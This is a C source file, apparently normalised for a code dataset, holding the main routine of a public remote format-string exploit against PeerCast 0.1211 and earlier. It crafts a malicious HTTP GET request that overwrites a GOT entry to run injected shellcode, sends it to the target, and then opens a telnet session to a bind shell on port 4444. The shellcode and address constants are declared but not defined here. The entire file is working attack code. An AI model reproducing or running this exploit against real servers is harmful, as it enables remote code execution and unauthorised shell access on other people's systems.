
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int endian ;
typedef int addr ;


 int AF_INET ;
 unsigned long GOTADDR ;
 char* HOST ;
 int IPPROTO_IP ;
 int PORT ;
 unsigned long SHELLADDR ;
 int SOCK_STREAM ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int doit (unsigned char,unsigned char,unsigned char,unsigned char,unsigned long) ;
 char* evil_builder (unsigned long,unsigned int,unsigned int,int) ;
 int exit (int ) ;
 int htons (int ) ;
 int inet_addr (char*) ;
 int memset (char*,int,int) ;
 int printf (char*) ;
 int send (int,char*,int,int ) ;
 char* shellcode ;
 int sleep (int) ;
 int snprintf (char*,int,char*,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char,unsigned char) ;
 int socket (int ,int ,int ) ;
 int sprintf (char*,char*,char*) ;
 int strcat (char*,char*) ;
 int strlen (char*) ;
 int system (char*) ;

int
main( int argc, char * argv[] )
{
  struct sockaddr_in addr;
  int sock;
  char * fmt;
  char endian[31337], da_shell[31337];
  unsigned long locaddr, retaddr;
  unsigned int offset, base;
  unsigned char b0, b1, b2, b3;

  system("clear");
  printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
  printf("*^*^*^                    by Darkeagle                 ^*^*^*\n");
  printf("*^*^*^      uKt researcherz [ http://unl0ck.org ]      ^*^*^*\n\n");

  memset( endian, 0x00, 31337 );
  memset( da_shell, 0x00, 31337 );

  addr.sin_family = AF_INET;
  addr.sin_port = htons(PORT);
  addr.sin_addr.s_addr = inet_addr(HOST);

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

  locaddr = GOTADDR;
  retaddr = SHELLADDR;
  offset = 1265;

  doit( b0, b1, b2, b3, locaddr );

  base = 4;
  printf("[*] Buildin' evil code\n");
  strcat(endian, "GET /html/en/index.html");
  snprintf( endian+strlen(endian), sizeof(endian),
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c",
             b3, b2, b1, b0,
             b3 + 1, b2, b1, b0,
             b3 + 2, b2, b1, b0,
             b3 + 3, b2, b1, b0 );

 fmt = evil_builder( retaddr, offset, base, 0x10 );

 memset(fmt+strlen(fmt), 0x55, 32);
 strcat(fmt, shellcode);
 strcat(endian, fmt);
 strcat(endian, "\r\n\r\n\r\n");
 printf("[+] Buildin' complete!\n");
 sprintf(da_shell, "telnet %s 4444", HOST);


 printf("[*] Connectin'\n");
 if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf("[-] Connection failed!\n\n"); exit(0); }

 printf("[+] Connected!\n");
 printf("[*] Sleepin'\n");
 sleep(1);

 printf("[*] Sendin'\n");
 send(sock, endian, strlen(endian), 0);

 printf("[*] Sleepin'\n");
 sleep(1);

 printf("[*] Connectin' in da shell\n\n");
 sleep(1);
 system(da_shell);
 return 0;
}
